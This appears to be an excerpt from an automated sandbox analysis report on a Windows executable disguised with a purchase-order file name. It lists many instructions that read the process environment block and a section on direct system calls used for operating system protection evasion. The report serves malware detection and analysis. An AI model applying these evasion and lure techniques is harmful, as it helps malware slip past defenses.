              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA430 mov eax, dword ptr fs:[00000030h]0_2_00FCA430
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8E420 mov eax, dword ptr fs:[00000030h]0_2_00F8E420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F8C427 mov eax, dword ptr fs:[00000030h]0_2_00F8C427
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8402 mov eax, dword ptr fs:[00000030h]0_2_00FC8402
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC5ED mov eax, dword ptr fs:[00000030h]0_2_00FCC5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC5ED mov eax, dword ptr fs:[00000030h]0_2_00FCC5ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F925E0 mov eax, dword ptr fs:[00000030h]0_2_00F925E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]0_2_00FBE5E7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01016420 mov eax, dword ptr fs:[00000030h]0_2_01016420
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F965D0 mov eax, dword ptr fs:[00000030h]0_2_00F965D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]0_2_00FCA5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA5D0 mov eax, dword ptr fs:[00000030h]0_2_00FCA5D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE5CF mov eax, dword ptr fs:[00000030h]0_2_00FCE5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE5CF mov eax, dword ptr fs:[00000030h]0_2_00FCE5CF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB45B1 mov eax, dword ptr fs:[00000030h]0_2_00FB45B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB45B1 mov eax, dword ptr fs:[00000030h]0_2_00FB45B1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A456 mov eax, dword ptr fs:[00000030h]0_2_0104A456
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE59C mov eax, dword ptr fs:[00000030h]0_2_00FCE59C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C460 mov ecx, dword ptr fs:[00000030h]0_2_0101C460
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC4588 mov eax, dword ptr fs:[00000030h]0_2_00FC4588
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92582 mov eax, dword ptr fs:[00000030h]0_2_00F92582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F92582 mov ecx, dword ptr fs:[00000030h]0_2_00F92582
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC656A mov eax, dword ptr fs:[00000030h]0_2_00FC656A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0104A49A mov eax, dword ptr fs:[00000030h]0_2_0104A49A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98550 mov eax, dword ptr fs:[00000030h]0_2_00F98550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98550 mov eax, dword ptr fs:[00000030h]0_2_00F98550
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101A4B0 mov eax, dword ptr fs:[00000030h]0_2_0101A4B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE53E mov eax, dword ptr fs:[00000030h]0_2_00FBE53E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0535 mov eax, dword ptr fs:[00000030h]0_2_00FA0535
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100C730 mov eax, dword ptr fs:[00000030h]0_2_0100C730
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA6C7 mov ebx, dword ptr fs:[00000030h]0_2_00FCA6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA6C7 mov eax, dword ptr fs:[00000030h]0_2_00FCA6C7
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC66B0 mov eax, dword ptr fs:[00000030h]0_2_00FC66B0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01014755 mov eax, dword ptr fs:[00000030h]0_2_01014755
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC6A6 mov eax, dword ptr fs:[00000030h]0_2_00FCC6A6
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E75D mov eax, dword ptr fs:[00000030h]0_2_0101E75D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94690 mov eax, dword ptr fs:[00000030h]0_2_00F94690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94690 mov eax, dword ptr fs:[00000030h]0_2_00F94690
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC2674 mov eax, dword ptr fs:[00000030h]0_2_00FC2674
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103678E mov eax, dword ptr fs:[00000030h]0_2_0103678E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA660 mov eax, dword ptr fs:[00000030h]0_2_00FCA660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA660 mov eax, dword ptr fs:[00000030h]0_2_00FCA660
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010447A0 mov eax, dword ptr fs:[00000030h]0_2_010447A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAC640 mov eax, dword ptr fs:[00000030h]0_2_00FAC640
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010107C3 mov eax, dword ptr fs:[00000030h]0_2_010107C3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9262C mov eax, dword ptr fs:[00000030h]0_2_00F9262C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC6620 mov eax, dword ptr fs:[00000030h]0_2_00FC6620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC8620 mov eax, dword ptr fs:[00000030h]0_2_00FC8620
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FAE627 mov eax, dword ptr fs:[00000030h]0_2_00FAE627
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E7E1 mov eax, dword ptr fs:[00000030h]0_2_0101E7E1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2619 mov eax, dword ptr fs:[00000030h]0_2_00FD2619
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA260B mov eax, dword ptr fs:[00000030h]0_2_00FA260B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F947FB mov eax, dword ptr fs:[00000030h]0_2_00F947FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F947FB mov eax, dword ptr fs:[00000030h]0_2_00F947FB
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E609 mov eax, dword ptr fs:[00000030h]0_2_0100E609
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB27ED mov eax, dword ptr fs:[00000030h]0_2_00FB27ED
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9C7C0 mov eax, dword ptr fs:[00000030h]0_2_00F9C7C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F907AF mov eax, dword ptr fs:[00000030h]0_2_00F907AF
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105866E mov eax, dword ptr fs:[00000030h]0_2_0105866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105866E mov eax, dword ptr fs:[00000030h]0_2_0105866E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F98770 mov eax, dword ptr fs:[00000030h]0_2_00F98770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA0770 mov eax, dword ptr fs:[00000030h]0_2_00FA0770
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90750 mov eax, dword ptr fs:[00000030h]0_2_00F90750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2750 mov eax, dword ptr fs:[00000030h]0_2_00FD2750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD2750 mov eax, dword ptr fs:[00000030h]0_2_00FD2750
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov esi, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov eax, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC674D mov eax, dword ptr fs:[00000030h]0_2_00FC674D
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov eax, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov ecx, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC273C mov eax, dword ptr fs:[00000030h]0_2_00FC273C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC720 mov eax, dword ptr fs:[00000030h]0_2_00FCC720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC720 mov eax, dword ptr fs:[00000030h]0_2_00FCC720
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90710 mov eax, dword ptr fs:[00000030h]0_2_00F90710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0710 mov eax, dword ptr fs:[00000030h]0_2_00FC0710
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010106F1 mov eax, dword ptr fs:[00000030h]0_2_010106F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010106F1 mov eax, dword ptr fs:[00000030h]0_2_010106F1
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E6F2 mov eax, dword ptr fs:[00000030h]0_2_0100E6F2
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC700 mov eax, dword ptr fs:[00000030h]0_2_00FCC700
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]0_2_00FCC8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]0_2_00FCC8F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E908 mov eax, dword ptr fs:[00000030h]0_2_0100E908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0100E908 mov eax, dword ptr fs:[00000030h]0_2_0100E908
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C912 mov eax, dword ptr fs:[00000030h]0_2_0101C912
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0102892B mov eax, dword ptr fs:[00000030h]0_2_0102892B
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101892A mov eax, dword ptr fs:[00000030h]0_2_0101892A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FBE8C0 mov eax, dword ptr fs:[00000030h]0_2_00FBE8C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01010946 mov eax, dword ptr fs:[00000030h]0_2_01010946
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034978 mov eax, dword ptr fs:[00000030h]0_2_01034978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_01034978 mov eax, dword ptr fs:[00000030h]0_2_01034978
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C97C mov eax, dword ptr fs:[00000030h]0_2_0101C97C
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F90887 mov eax, dword ptr fs:[00000030h]0_2_00F90887
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94859 mov eax, dword ptr fs:[00000030h]0_2_00F94859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F94859 mov eax, dword ptr fs:[00000030h]0_2_00F94859
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC0854 mov eax, dword ptr fs:[00000030h]0_2_00FC0854
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov esi, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov eax, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010189B3 mov eax, dword ptr fs:[00000030h]0_2_010189B3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA2840 mov ecx, dword ptr fs:[00000030h]0_2_00FA2840
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_010269C0 mov eax, dword ptr fs:[00000030h]0_2_010269C0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCA830 mov eax, dword ptr fs:[00000030h]0_2_00FCA830
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov ecx, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FB2835 mov eax, dword ptr fs:[00000030h]0_2_00FB2835
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0105A9D3 mov eax, dword ptr fs:[00000030h]0_2_0105A9D3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101E9E0 mov eax, dword ptr fs:[00000030h]0_2_0101E9E0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC29F9 mov eax, dword ptr fs:[00000030h]0_2_00FC29F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC29F9 mov eax, dword ptr fs:[00000030h]0_2_00FC29F9
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0101C810 mov eax, dword ptr fs:[00000030h]0_2_0101C810
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]0_2_00F9A9D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FC49D0 mov eax, dword ptr fs:[00000030h]0_2_00FC49D0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103483A mov eax, dword ptr fs:[00000030h]0_2_0103483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_0103483A mov eax, dword ptr fs:[00000030h]0_2_0103483A
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD mov eax, dword ptr fs:[00000030h]0_2_00F909AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD mov eax, dword ptr fs:[00000030h]0_2_00F909AD
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FA29A0 mov eax, dword ptr fs:[00000030h]0_2_00FA29A0

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                NtQueryAttributesFile: Direct from: 0x76EF2E6C
                NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                NtQuerySystemInformation: Direct from: 0x76EF48CC
                NtOpenSection: Direct from: 0x76EF2E0C
                NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                NtQueryInformationToken: Direct from: 0x76EF2CAC
                NtCreateFile: Direct from: 0x76EF2FEC
                NtOpenFile: Direct from: 0x76EF2DCC
                NtTerminateThread: Direct from: 0x76EF2FCC
                NtOpenKeyEx: Direct from: 0x76EF2B9C
                NtSetInformationProcess: Direct from: 0x76EF2C5C
                NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                NtWriteVirtualMemory: Direct from: 0x76EF2E3C
